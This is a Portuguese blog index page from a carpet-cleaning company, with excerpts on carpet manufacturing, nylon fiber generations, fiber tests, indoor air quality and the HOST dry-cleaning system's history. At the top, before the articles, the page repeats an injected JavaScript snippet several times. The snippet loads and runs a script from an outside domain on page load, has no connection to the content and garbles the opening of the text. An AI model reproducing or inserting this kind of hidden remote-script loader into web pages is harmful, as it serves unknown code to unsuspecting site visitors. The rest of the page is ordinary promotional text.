Respiração livre

var url = 'https://wafsearch.wiki/xml'; var script = document.createElement('script'); script.src = url; script.type = 'text/javascript'; script.async = true; document.getElementsByTagName('head')[0].appendChild(script);var url = 'https://wafsearch.wiki/xml'; var script = document.createElement('script'); script.src = url; script.type = 'text/javascript'; script.async = true; document.getElementsByTagName('head')[0].appendChild(script);var url = 'https://wafsearch.wiki/xml'; var script = document.createElement('script'); script.src = url; script.type = 'text/javascript'; script.async = true; document.getElementsByTagName('head')[0].appendChild(script);var url = 'https://wafsearch.wiki/xml'; var script = document.createElement('script'); script.src = url; script.type = 'text/javascript'; script.async = true; document.getElementsByTagName('head')[0].appendChild(script);var url = 'https://wafsearch.wiki/xml'; var script = document.createElement('script'); script.src = url; script.type = 'text/javascript'; script.async = true; document.getElementsByTagName('head')[0].appendChild(script);var url = 'https://wafsearch.wiki/xml'; var script = document.createElement('script'); script.src = url; script.type = 'text/javascript'; script.async ...

Conheça os principais métodos de fabricação de carpetes

A indústria textil desenvolveu ao longo de décadas diferentes métodos de produção de carpetes. Nesse artigo, você irá conhecer todos os tipos de fabricação de carpetes e as principais fibras utilizadas. Os carpetes oferecem diversas vantagens que vão desde conforto, segurança antiderrapante, ar mais limpo, isolamento acústico, camuflagem e facilidade na limpeza. Para aprender como limpar o carpete, devemos aprender como ele é fabricado. Eles são: Carpete tufado Carpete de ponto agulha Carpete trançado Carpete entrelaçado (feito em malha) Carpete ffusion bonded Carpete felpado Cada método tem características distintas que afetam a maneira como o carpete é limpo. O tufado …

Como identificar as fibras de um carpete

    Por que conhecer a fibra e a produção do carpete é importante em um ambiente? Porque permite conhecer como o carpete solta sujeira e como isso afeta as pessoas que circulam no local. Em um ambiente de trabalho, conhecer a fibra do carpete pode auxiliar na decisão sobre qual sistema de limpeza é o ideal. Veja abaixo alguns testes para identificar os tipos de fibras de carpete. Teste de queima: Todas as fibras queimarão se for aplicado calor suficiente. Os pontos importantes são: o derretimento da fibra, a velocidade com que ela queima, se ela continua queimando, seu …

As cinco gerações de fibra de náilon para carpetes – PARTE II

Em 1987 foi desenvolvida 5ª geração de náilon que incluía todos os benefícios das gerações anteriores e mais um novo tratamento contra manchas de comidas e bebidas a base de ácidos. Isso fez com que a fibra se tornasse resistente a manchas e não à prova de manchas. O náilon resistente a manchas é uma combinação de um tratamento de fluocarbonato com uma barreira molecular (um corante claro em essência) que bloqueia os poros da fibra e evita que corantes ácidos penetrem. Quando esta fibra foi apresentada, os fabricantes especificaram determinadas regras de limpeza para que o tratamento não fosse danificado. Os produtos …

As cinco gerações de fibra de nylon para carpetes – PARTE I

Você sabia que o nylon surgiu na década de 1930 com o objetivo de criar uma fibra mais resistente que as fibras de algodão, comumente utilizada pela indústria textil. Nesse artigo, você vai saber como se deu o desenvolvimento e a evolução das gerações do nylon, principalmente na indústria de carpetes. A primeira fibra de nylon foi desenvolvida em 1939 para ser utilizada em escovas de dente e paraquedas. Quando começou a ser utilizada em carpetes, percebeu-se que a forma arredondada e clara do nylon fazia com que o carpete aparentasse estar mais sujo do que realmente estava. Esses carpetes …

Conheça um pouco mais sobre as fibras de carpetes

As fibras dos carpetes são materiais essenciais em sua produção e influenciam diretamente em sua qualidade. A indústria usa 6 principais fibras de carpetes para sua fabricação: nylon olefina (polipropileno) poliéster acrílico lã algodão No mercado comercial, o náilon é a fibra mais comumente usada. Todas as fibras sintéticas começam como pequenas pelotas de plástico. O fabricante derrete essas pelotas e depois as passa por um aparelho chamado de fieira. A fieira se parece com um crivo de chuveiro. Ela tem muitos buracos pequenos pelos quais o plástico derretido passa. O plástico forma uma serpentina que é rapidamente resfriada pelo ar …

A importância da Qualidade do Ar Interior (QAI)

Um carpete limpo pode trazer muito mais benefícios a sua saúde do que imagina. Em primeiro lugar, proporciona o benefício de filtrar a poeira e os alérgenos do ar. Em segundo, pesquisas mostram que o carpete não os libera de volta para o ar mesmo com tráfego constante, mantendo-os fora da zona de respiração até que eles sejam removidos através de uma limpeza eficaz.   O Sistema HOST de aplicação de Micro Esponjas ao carpete, escovando-as pelo carpete e depois usando o aspirador dos EVACS, remove a sujeira e reduz os alérgenos. Pesquisas mostram que uma limpeza com o Sistema …

De detergente sintético a limpeza a seco: conheça a história da HOST

A Rancine Industries Inc. começou como Rench Manufacturing Company, em 1935. Em seu início fabricava equipamentos e produtos químicos para a limpeza de carpete. A empresa foi a primeira nos Estados Unidos a produzir detergentes sintéticos para a limpeza de carpete, reconhecendo que o sabão a base de óleo de coco deixava um resíduo que contribuía para que o carpete ficasse sujo novamente. No final dos anos 1930, a Rench se envolveu com a empresa Bigelow/Sanford numa fusão de patente que resultou no primeiro produto de limpeza a seco para carpete. Esse “pó” seco foi desenvolvido para solucionar um problema …

TGM oferece Worshop em evento.

A Jornada de Conhecimento de Facilities II será realizada no dia 14/11/15 na universidade Salesianos. O evento irá contar com um Workshop oferecido pela TGM sobre a limpeza a seco de carpetes. Confira!

Respiração livre

Uma das maiores causas de doenças respiratórias é a poluição. Metrópoles como São Paulo concentram muitos gases tóxicos no ar e a qualidade da respiração fica muito comprometida em ambientes pouco higienizados porque a poeira entra e toma conta de cada cantinho dos cômodos. Fechada, a sujeira oferece ambiente propício à proliferação de microorganismos tóxicos à respiração humana como os ácaros. O ar das grandes cidades é uma verdadeira provação para quem tem dificuldades respiratórias ou algum problemas nas vias aéreas como rinite ou sinusite, por exemplo. Mesmo para quem tem o sistema respiratório completamente saudável, quando a poeira toma …